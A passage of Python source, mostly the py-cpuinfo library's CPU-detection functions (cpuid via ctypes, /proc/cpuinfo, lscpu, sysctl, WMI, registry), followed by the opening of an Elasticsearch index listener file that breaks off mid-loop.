high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
get_ticks_x86_32(ctypes.byref(high), ctypes.byref(low))
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64, address = self._asm_func(restype, argtypes,
[
b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64()
return retval
def get_raw_hz(self):
start = self.get_ticks()
time.sleep(1)
end = self.get_ticks()
ticks = (end - start)
return ticks
def _actual_get_cpu_info_from_cpuid(queue):
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
# Pipe all output to nothing
sys.stdout = open(os.devnull, 'w')
sys.stderr = open(os.devnull, 'w')
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Return none if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
queue.put(obj_to_b64({}))
return
# Return none if SE Linux is in enforcing mode
cpuid = CPUID()
if cpuid.is_selinux_enforcing:
queue.put(obj_to_b64({}))
return
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
# Get the Hz and scale
hz_actual = cpuid.get_raw_hz()
hz_actual = to_hz_string(hz_actual)
# Get the Hz and scale
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : cpuid.get_vendor_id(),
'hardware' : '',
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_info['size_kb']),
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : hex(cache_info['associativity']),
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'extended_model' : info['extended_model'],
'extended_family' : info['extended_family'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = {k: v for k, v in info.items() if v}
queue.put(obj_to_b64(info))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
from multiprocessing import Process, Queue
# Return {} if can't cpuid
if not DataSource.can_cpuid:
return {}
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
return {}
try:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_actual_get_cpu_info_from_cpuid, args=(queue,))
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
return {}
# Return the result, only if there is something to read
if not queue.empty():
output = queue.get()
return b64_to_obj(output)
except:
pass
# Return {} if everything failed
return {}
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name','cpu', 'processor')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = to_hz_string(hz_actual)
# Convert from GHz/MHz string to Hz
scale, hz_advertised = (0, None)
try:
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
except Exception:
pass
info = {
'hardware' : hardware,
'brand' : processor_brand,
'l3_cache_size' : to_friendly_bytes(cache_size),
'flags' : flags,
'vendor_id' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# Make the Hz the same for actual and advertised if missing any
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if to_raw_hz(hz_advertised, scale) > (0, 0):
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
if to_raw_hz(hz_actual, scale) > (0, 0):
info['hz_actual'] = to_friendly_hz(hz_actual, 6)
info['hz_actual_raw'] = to_raw_hz(hz_actual, 6)
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
try:
scale, hz_brand = 1, '0.0'
if not DataSource.has_cpufreq_info():
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
info = {
'hz_advertised' : to_friendly_hz(hz_brand, scale),
'hz_actual' : to_friendly_hz(hz_brand, scale),
'hz_advertised_raw' : to_raw_hz(hz_brand, scale),
'hz_actual_raw' : to_raw_hz(hz_brand, scale),
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
try:
if not DataSource.has_lscpu():
return {}
returncode, output = DataSource.lscpu()
if returncode != 0:
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = to_hz_string(new_hz)
scale = 6
info['hz_advertised'] = to_friendly_hz(new_hz, scale)
info['hz_actual'] = to_friendly_hz(new_hz, scale)
info['hz_advertised_raw'] = to_raw_hz(new_hz, scale)
info['hz_actual_raw'] = to_raw_hz(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id'] = vendor_id
brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = to_friendly_bytes(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = to_friendly_bytes(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache')
if l2_cache_size:
info['l2_cache_size'] = to_friendly_bytes(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = to_friendly_bytes(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
value = [s for s in value if s in list('0123456789abcfed')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : is_bit_set(left, 0),
'fpu' : is_bit_set(left, 1),
'slb' : is_bit_set(left, 2),
'run' : is_bit_set(left, 3),
#'reserved' : is_bit_set(left, 4),
'dabr' : is_bit_set(left, 5),
'ne' : is_bit_set(left, 6),
'wtr' : is_bit_set(left, 7),
# Byte 1
'mcr' : is_bit_set(left, 8),
'dsisr' : is_bit_set(left, 9),
'lp' : is_bit_set(left, 10),
'ri' : is_bit_set(left, 11),
'dabrx' : is_bit_set(left, 12),
'sprg3' : is_bit_set(left, 13),
'rislb' : is_bit_set(left, 14),
'pp' : is_bit_set(left, 15),
# Byte 2
'vpm' : is_bit_set(left, 16),
'dss_2.05' : is_bit_set(left, 17),
#'reserved' : is_bit_set(left, 18),
'dar' : is_bit_set(left, 19),
#'reserved' : is_bit_set(left, 20),
'ppr' : is_bit_set(left, 21),
'dss_2.02' : is_bit_set(left, 22),
'dss_2.06' : is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : is_bit_set(left, 24),
'ugr_in_dscr' : is_bit_set(left, 25),
#'reserved' : is_bit_set(left, 26),
#'reserved' : is_bit_set(left, 27),
#'reserved' : is_bit_set(left, 28),
#'reserved' : is_bit_set(left, 29),
#'reserved' : is_bit_set(left, 30),
#'reserved' : is_bit_set(left, 31),
# Byte 4
'sso_2.06' : is_bit_set(right, 0),
#'reserved' : is_bit_set(right, 1),
#'reserved' : is_bit_set(right, 2),
#'reserved' : is_bit_set(right, 3),
#'reserved' : is_bit_set(right, 4),
#'reserved' : is_bit_set(right, 5),
#'reserved' : is_bit_set(right, 6),
#'reserved' : is_bit_set(right, 7),
# Byte 5
'le' : is_bit_set(right, 8),
'cfar' : is_bit_set(right, 9),
'eb' : is_bit_set(right, 10),
'lsq_2.07' : is_bit_set(right, 11),
#'reserved' : is_bit_set(right, 12),
#'reserved' : is_bit_set(right, 13),
#'reserved' : is_bit_set(right, 14),
#'reserved' : is_bit_set(right, 15),
# Byte 6
'dss_2.07' : is_bit_set(right, 16),
#'reserved' : is_bit_set(right, 17),
#'reserved' : is_bit_set(right, 18),
#'reserved' : is_bit_set(right, 19),
#'reserved' : is_bit_set(right, 20),
#'reserved' : is_bit_set(right, 21),
#'reserved' : is_bit_set(right, 22),
#'reserved' : is_bit_set(right, 23),
# Byte 7
#'reserved' : is_bit_set(right, 24),
#'reserved' : is_bit_set(right, 25),
#'reserved' : is_bit_set(right, 26),
#'reserved' : is_bit_set(right, 27),
#'reserved' : is_bit_set(right, 28),
#'reserved' : is_bit_set(right, 29),
#'reserved' : is_bit_set(right, 30),
#'reserved' : is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
Returns {} if not on Windows, or wmic is not installed.
'''
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
return {}
# Break the list into key values pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
scale_advertised, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = to_hz_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize')
if l2_cache_size:
l2_cache_size = l2_cache_size + ' KB'
l3_cache_size = value.get('L3CacheSize')
if l3_cache_size:
l3_cache_size = l3_cache_size + ' KB'
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id' : value.get('Manufacturer'),
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale_advertised),
'hz_actual' : to_friendly_hz(hz_actual, scale_actual),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale_advertised),
'hz_actual_raw' : to_raw_hz(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_registry():
'''
FIXME: Is missing many of the newer CPU flags like sse3
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id()
# Get the CPU arch and bits
raw_arch_string = DataSource.winreg_raw_arch_string()
arch, bits = parse_arch(raw_arch_string)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = to_hz_string(hz_actual)
# Get the advertised CPU Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 6),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 6),
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = to_hz_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def CopyNewFields(info, new_info):
keys = [
'vendor_id', 'hardware', 'brand', 'hz_advertised', 'hz_actual',
'hz_advertised_raw', 'hz_actual_raw', 'arch', 'bits', 'count',
'raw_arch_string', 'l2_cache_size', 'l2_cache_line_size',
'l2_cache_associativity', 'stepping', 'model', 'family',
'processor_type', 'extended_model', 'extended_family', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'raw_arch_string' : DataSource.raw_arch_string,
}
# Try the Windows wmic
CopyNewFields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
CopyNewFields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
CopyNewFields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
CopyNewFields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
CopyNewFields(info, _get_cpu_info_from_lscpu())
# Try sysctl
CopyNewFields(info, _get_cpu_info_from_sysctl())
# Try kstat
CopyNewFields(info, _get_cpu_info_from_kstat())
# Try dmesg
CopyNewFields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
CopyNewFields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
CopyNewFields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
CopyNewFields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
CopyNewFields(info, _get_cpu_info_from_cpuid())
return info
# Make sure we are running on a supported system
def _check_arch():
arch, bits = parse_arch(DataSource.raw_arch_string)
if not arch in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8', 'PPC_64', 'S390X', 'MIPS_32', 'MIPS_64', 'LOONG_32', 'LOONG_64']:
raise Exception("py-cpuinfo currently only works on X86 and some PPC, S390X, MIPS, LOONG and ARM CPUs.")
def main():
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = get_cpu_info()
if info:
print('python version: {0}'.format(info.get('python_version', '')))
print('cpuinfo version: {0}'.format(info.get('cpuinfo_version', '')))
print('Vendor ID: {0}'.format(info.get('vendor_id', '')))
print('Hardware Raw: {0}'.format(info.get('hardware', '')))
print('Brand: {0}'.format(info.get('brand', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Hz Advertised Raw: {0}'.format(info.get('hz_advertised_raw', '')))
print('Hz Actual Raw: {0}'.format(info.get('hz_actual_raw', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Raw Arch String: {0}'.format(info.get('raw_arch_string', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Extended Model: {0}'.format(info.get('extended_model', '')))
print('Extended Family: {0}'.format(info.get('extended_family', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
else:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if __name__ == '__main__':
from multiprocessing import freeze_support
freeze_support()
main()
else:
_check_arch()
|
es_index_listener.py
|
"""\
Example.
%(prog)s production.ini
"""
from webtest import TestApp
from contentbase.storage import DBSession
import atexit
import datetime
import json
import logging
import os
import psycopg2
import select
import signal
import socket
import sqlalchemy.exc
import sys
import threading
import time
from urllib.parse import parse_qsl
log = logging.getLogger(__name__)
EPILOG = __doc__
DEFAULT_TIMEOUT = 60
PY2 = sys.version_info[0] == 2
# We need this because of MVCC visibility.
# See slide 9 at http://momjian.us/main/writings/pgsql/mvcc.pdf
# https://devcenter.heroku.com/articles/postgresql-concurrency
def run(testapp, timeout=DEFAULT_TIMEOUT, dry_run=False, control=None, update_status=None):
assert update_status is not None
timestamp = datetime.datetime.now().isoformat()
update_status(
status='connecting',
timestamp=timestamp,
timeout=timeout,
)
max_xid = 0
engine = DBSession.bind # DBSession.bind is configured by app init
# noqa http://docs.sqlalchemy.org/en/latest/faq.html#how-do-i-get-at-the-raw-dbapi-connection-when-using-an-engine
connection = engine.pool.unique_connection()
try:
connection.detach()
conn = connection.connection
conn.autocommit = True
sockets = [conn]
if control is not None:
sockets.append(control)
recovery = None
listening = False
with conn.cursor() as cursor:
while True:
if not listening:
# cannot execute LISTEN during recovery
